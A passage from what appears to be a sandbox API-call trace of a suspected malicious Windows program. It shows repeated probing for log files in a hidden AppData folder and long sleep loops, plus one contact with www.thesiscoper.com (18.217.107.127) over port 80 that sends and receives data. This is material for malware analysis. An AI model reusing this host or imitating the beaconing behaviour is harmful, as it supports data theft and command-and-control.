NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0145.169] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0145.169] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0145.169] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894fa00) returned 1 [0145.169] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0145.169] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0145.169] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0145.169] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894f340) returned 1 [0145.169] Sleep (dwMilliseconds=0x7d0) [0145.171] Sleep (dwMilliseconds=0x7d0) [0145.184] Sleep (dwMilliseconds=0x7d0) [0145.185] Sleep (dwMilliseconds=0x7d0) [0145.187] Sleep (dwMilliseconds=0x7d0) [0145.188] Sleep (dwMilliseconds=0x7d0) [0145.190] Sleep (dwMilliseconds=0x7d0) [0145.192] Sleep (dwMilliseconds=0x7d0) [0145.193] Sleep (dwMilliseconds=0x7d0) [0145.194] Sleep (dwMilliseconds=0x7d0) [0145.196] Sleep (dwMilliseconds=0x7d0) [0145.197] Sleep (dwMilliseconds=0x7d0) [0145.199] Sleep (dwMilliseconds=0x7d0) [0145.200] Sleep (dwMilliseconds=0x7d0) [0145.202] Sleep (dwMilliseconds=0x7d0) [0145.203] Sleep (dwMilliseconds=0x7d0) [0145.205] Sleep (dwMilliseconds=0x7d0) [0145.206] Sleep (dwMilliseconds=0x7d0) [0145.208] Sleep (dwMilliseconds=0x7d0) [0145.209] Sleep (dwMilliseconds=0x7d0) [0145.211] Sleep (dwMilliseconds=0x7d0) [0145.212] Sleep (dwMilliseconds=0x7d0) [0145.214] Sleep (dwMilliseconds=0x7d0) [0145.215] Sleep (dwMilliseconds=0x7d0) [0145.217] Sleep (dwMilliseconds=0x7d0) [0145.218] Sleep (dwMilliseconds=0x7d0) [0145.220] Sleep (dwMilliseconds=0x7d0) [0145.221] Sleep (dwMilliseconds=0x7d0) [0145.223] Sleep (dwMilliseconds=0x7d0) [0145.224] Sleep (dwMilliseconds=0x7d0) [0145.227] Sleep (dwMilliseconds=0x7d0) [0145.228] Sleep (dwMilliseconds=0x7d0) [0145.229] Sleep (dwMilliseconds=0x7d0) [0145.231] Sleep (dwMilliseconds=0x7d0) [0145.232] Sleep (dwMilliseconds=0x7d0) [0145.234] Sleep (dwMilliseconds=0x7d0) [0145.235] Sleep (dwMilliseconds=0x7d0) [0145.237] Sleep (dwMilliseconds=0x7d0) [0145.238] Sleep (dwMilliseconds=0x7d0) [0145.241] Sleep (dwMilliseconds=0x7d0) [0145.242] Sleep (dwMilliseconds=0x7d0) [0145.244] Sleep (dwMilliseconds=0x7d0) [0145.245] Sleep (dwMilliseconds=0x7d0) [0145.247] Sleep (dwMilliseconds=0x7d0) [0145.250] Sleep (dwMilliseconds=0x7d0) [0145.251] Sleep (dwMilliseconds=0x7d0) [0145.252] Sleep (dwMilliseconds=0x7d0) [0145.254] Sleep (dwMilliseconds=0x7d0) [0145.255] Sleep (dwMilliseconds=0x7d0) [0145.257] Sleep (dwMilliseconds=0x7d0) [0145.258] Sleep (dwMilliseconds=0x7d0) [0145.260] Sleep (dwMilliseconds=0x7d0) [0145.261] Sleep (dwMilliseconds=0x7d0) [0145.263] Sleep (dwMilliseconds=0x7d0) [0145.264] Sleep (dwMilliseconds=0x7d0) [0145.266] Sleep (dwMilliseconds=0x7d0) [0145.267] Sleep (dwMilliseconds=0x7d0) [0145.269] Sleep (dwMilliseconds=0x7d0) [0145.270] Sleep (dwMilliseconds=0x7d0) [0145.272] Sleep (dwMilliseconds=0x7d0) [0145.273] Sleep (dwMilliseconds=0x7d0) [0145.275] Sleep (dwMilliseconds=0x7d0) [0145.276] Sleep (dwMilliseconds=0x7d0) [0145.278] Sleep (dwMilliseconds=0x7d0) [0145.279] Sleep (dwMilliseconds=0x7d0) [0145.281] Sleep (dwMilliseconds=0x7d0) [0145.282] Sleep (dwMilliseconds=0x7d0) [0145.284] Sleep (dwMilliseconds=0x7d0) [0145.285] Sleep (dwMilliseconds=0x7d0) [0145.287] Sleep (dwMilliseconds=0x7d0) [0145.288] Sleep (dwMilliseconds=0x7d0) [0145.290] Sleep (dwMilliseconds=0x7d0) [0145.291] Sleep (dwMilliseconds=0x7d0) [0145.293] Sleep (dwMilliseconds=0x7d0) [0145.294] Sleep (dwMilliseconds=0x7d0) [0145.296] Sleep (dwMilliseconds=0x7d0) [0145.297] Sleep (dwMilliseconds=0x7d0) [0145.299] Sleep (dwMilliseconds=0x7d0) [0145.300] Sleep (dwMilliseconds=0x7d0) [0145.303] Sleep (dwMilliseconds=0x7d0) [0145.304] Sleep (dwMilliseconds=0x7d0) [0145.305] Sleep (dwMilliseconds=0x7d0) [0145.307] Sleep (dwMilliseconds=0x7d0) [0145.308] Sleep (dwMilliseconds=0x7d0) [0145.310] Sleep (dwMilliseconds=0x7d0) [0145.312] Sleep (dwMilliseconds=0x7d0) [0145.314] Sleep (dwMilliseconds=0x7d0) [0145.400] Sleep (dwMilliseconds=0x7d0) [0145.402] Sleep (dwMilliseconds=0x7d0) [0145.403] Sleep (dwMilliseconds=0x7d0) [0145.405] Sleep (dwMilliseconds=0x7d0) [0145.406] Sleep (dwMilliseconds=0x7d0) [0145.408] Sleep (dwMilliseconds=0x7d0) [0145.409] Sleep (dwMilliseconds=0x7d0) [0145.411] Sleep (dwMilliseconds=0x7d0) [0145.412] Sleep (dwMilliseconds=0x7d0) [0145.414] Sleep (dwMilliseconds=0x7d0) [0145.415] Sleep (dwMilliseconds=0x7d0) [0145.417] Sleep (dwMilliseconds=0x7d0) [0145.418] Sleep (dwMilliseconds=0x7d0) [0145.420] Sleep (dwMilliseconds=0x7d0) [0145.421] Sleep (dwMilliseconds=0x7d0) [0145.423] Sleep (dwMilliseconds=0x7d0) [0145.424] Sleep (dwMilliseconds=0x7d0) [0145.426] Sleep (dwMilliseconds=0x7d0) [0145.427] Sleep (dwMilliseconds=0x7d0) [0145.429] Sleep (dwMilliseconds=0x7d0) [0145.430] Sleep (dwMilliseconds=0x7d0) [0145.468] Sleep (dwMilliseconds=0x7d0) [0145.469] Sleep (dwMilliseconds=0x7d0) [0145.471] Sleep (dwMilliseconds=0x7d0) [0145.472] Sleep (dwMilliseconds=0x7d0) [0145.474] Sleep (dwMilliseconds=0x7d0) [0145.475] Sleep (dwMilliseconds=0x7d0) [0145.477] Sleep (dwMilliseconds=0x7d0) [0145.478] Sleep (dwMilliseconds=0x7d0) [0145.480] Sleep (dwMilliseconds=0x7d0) [0145.481] Sleep (dwMilliseconds=0x7d0) [0145.484] Sleep (dwMilliseconds=0x7d0) [0145.485] Sleep (dwMilliseconds=0x7d0) [0145.489] Sleep (dwMilliseconds=0x7d0) [0145.491] Sleep (dwMilliseconds=0x7d0) [0145.527] Sleep (dwMilliseconds=0x7d0) [0145.528] Sleep (dwMilliseconds=0x7d0) [0145.530] Sleep (dwMilliseconds=0x7d0) [0145.531] Sleep (dwMilliseconds=0x7d0) [0145.533] Sleep (dwMilliseconds=0x7d0) [0145.534] Sleep (dwMilliseconds=0x7d0) [0145.596] Sleep (dwMilliseconds=0x7d0) [0145.598] Sleep (dwMilliseconds=0x7d0) [0145.600] Sleep (dwMilliseconds=0x7d0) [0145.601] Sleep (dwMilliseconds=0x7d0) [0145.603] Sleep (dwMilliseconds=0x7d0) [0145.604] Sleep (dwMilliseconds=0x7d0) [0145.606] Sleep (dwMilliseconds=0x7d0) [0145.607] Sleep (dwMilliseconds=0x7d0) [0145.609] Sleep (dwMilliseconds=0x7d0) [0145.610] Sleep (dwMilliseconds=0x7d0) [0145.612] Sleep (dwMilliseconds=0x7d0) [0145.613] Sleep (dwMilliseconds=0x7d0) [0145.615] Sleep (dwMilliseconds=0x7d0) [0145.616] Sleep (dwMilliseconds=0x7d0) [0145.618] Sleep (dwMilliseconds=0x7d0) [0145.619] Sleep (dwMilliseconds=0x7d0) [0145.621] Sleep (dwMilliseconds=0x7d0) [0145.622] Sleep (dwMilliseconds=0x7d0) [0145.624] Sleep (dwMilliseconds=0x7d0) [0145.625] Sleep (dwMilliseconds=0x7d0) [0145.627] Sleep (dwMilliseconds=0x7d0) [0145.628] Sleep (dwMilliseconds=0x7d0) [0145.630] Sleep (dwMilliseconds=0x7d0) [0145.631] Sleep (dwMilliseconds=0x7d0) [0145.633] Sleep (dwMilliseconds=0x7d0) [0145.634] Sleep (dwMilliseconds=0x7d0) [0145.636] Sleep (dwMilliseconds=0x7d0) [0145.637] Sleep (dwMilliseconds=0x7d0) [0145.639] Sleep (dwMilliseconds=0x7d0) [0145.640] Sleep (dwMilliseconds=0x7d0) [0145.642] Sleep (dwMilliseconds=0x7d0) [0145.643] Sleep (dwMilliseconds=0x7d0) [0145.645] Sleep (dwMilliseconds=0x7d0) [0145.646] Sleep (dwMilliseconds=0x7d0) [0145.648] Sleep (dwMilliseconds=0x7d0) [0145.649] Sleep (dwMilliseconds=0x7d0) [0145.651] Sleep (dwMilliseconds=0x7d0) [0145.652] Sleep (dwMilliseconds=0x7d0) [0145.654] Sleep (dwMilliseconds=0x7d0) [0145.655] Sleep (dwMilliseconds=0x7d0) [0145.657] Sleep (dwMilliseconds=0x7d0) [0145.658] Sleep (dwMilliseconds=0x7d0) [0145.660] Sleep (dwMilliseconds=0x7d0) [0145.661] Sleep (dwMilliseconds=0x7d0) [0145.663] Sleep (dwMilliseconds=0x7d0) [0145.664] Sleep (dwMilliseconds=0x7d0) [0145.666] Sleep (dwMilliseconds=0x7d0) [0145.667] Sleep (dwMilliseconds=0x7d0) [0145.669] Sleep (dwMilliseconds=0x7d0) [0145.670] Sleep (dwMilliseconds=0x7d0) [0145.672] Sleep (dwMilliseconds=0x7d0) [0145.674] Sleep (dwMilliseconds=0x7d0) [0145.676] Sleep (dwMilliseconds=0x7d0) [0145.677] Sleep (dwMilliseconds=0x7d0) [0145.679] Sleep (dwMilliseconds=0x7d0) [0145.680] Sleep (dwMilliseconds=0x7d0) [0145.682] Sleep (dwMilliseconds=0x7d0) [0145.683] Sleep (dwMilliseconds=0x7d0) [0145.685] Sleep (dwMilliseconds=0x7d0) [0145.686] Sleep (dwMilliseconds=0x7d0) [0145.688] Sleep (dwMilliseconds=0x7d0) [0145.689] Sleep (dwMilliseconds=0x7d0) [0145.691] Sleep (dwMilliseconds=0x7d0) [0145.692] Sleep (dwMilliseconds=0x7d0) [0145.694] Sleep (dwMilliseconds=0x7d0) [0145.695] Sleep (dwMilliseconds=0x7d0) [0145.697] Sleep (dwMilliseconds=0x7d0) [0145.698] Sleep (dwMilliseconds=0x7d0) [0145.700] Sleep (dwMilliseconds=0x7d0) [0145.701] Sleep (dwMilliseconds=0x7d0) [0145.703] Sleep (dwMilliseconds=0x7d0) [0145.704] Sleep (dwMilliseconds=0x7d0) [0145.706] Sleep (dwMilliseconds=0x7d0) [0145.707] Sleep (dwMilliseconds=0x7d0) [0145.709] Sleep (dwMilliseconds=0x7d0) [0145.710] Sleep (dwMilliseconds=0x7d0) [0145.712] Sleep (dwMilliseconds=0x7d0) [0145.713] Sleep (dwMilliseconds=0x7d0) [0145.715] Sleep (dwMilliseconds=0x7d0) [0145.716] socket (af=2, type=1, protocol=6) returned 0x24d4 [0145.717] getaddrinfo (in: pNodeName="www.thesiscoper.com", pServiceName="80", pHints=0x878faf8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x878fb28 | out: ppResult=0x878fb28*=0x4d505e0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8884120*(sa_family=2, sin_port=0x50, sin_addr="18.217.107.127"), ai_next=0x0)) returned 0 [0146.085] htons (hostshort=0x50) returned 0x5000 [0146.085] connect (s=0x24d4, name=0x8884120*(sa_family=2, sin_port=0x50, sin_addr="18.217.107.127"), namelen=16) returned 0 [0146.229] send (s=0x24d4, buf=0xa10808a*, len=163, flags=0) returned 163 [0146.229] setsockopt (s=0x24d4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0146.229] recv (in: s=0x24d4, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040*) returned 257 [0146.358] closesocket (s=0x24d4) returned 0 [0146.359] Sleep (dwMilliseconds=0x7d0) [0146.360] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.360] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.360] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0146.361] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929f00) returned 1 [0146.361] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.361] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.361] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0146.361] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928be0) returned 1 [0146.361] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.361] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.361] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0146.361] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929600) returned 1 [0146.361] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.361] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.361] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0146.361] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a140) returned 1 [0146.361] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.361] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.361] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0146.361] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929f00) returned 1 [0146.361] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.361] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.362] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0146.362] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929f00) returned 1 [0146.362] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.362] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.362] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0146.362] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929600) returned 1 [0146.362] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.362] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.362] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0146.362] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x89290f0) returned 1 [0146.362] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.362] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.362] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0146.362] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928be0) returned 1 [0146.362] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.362] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, 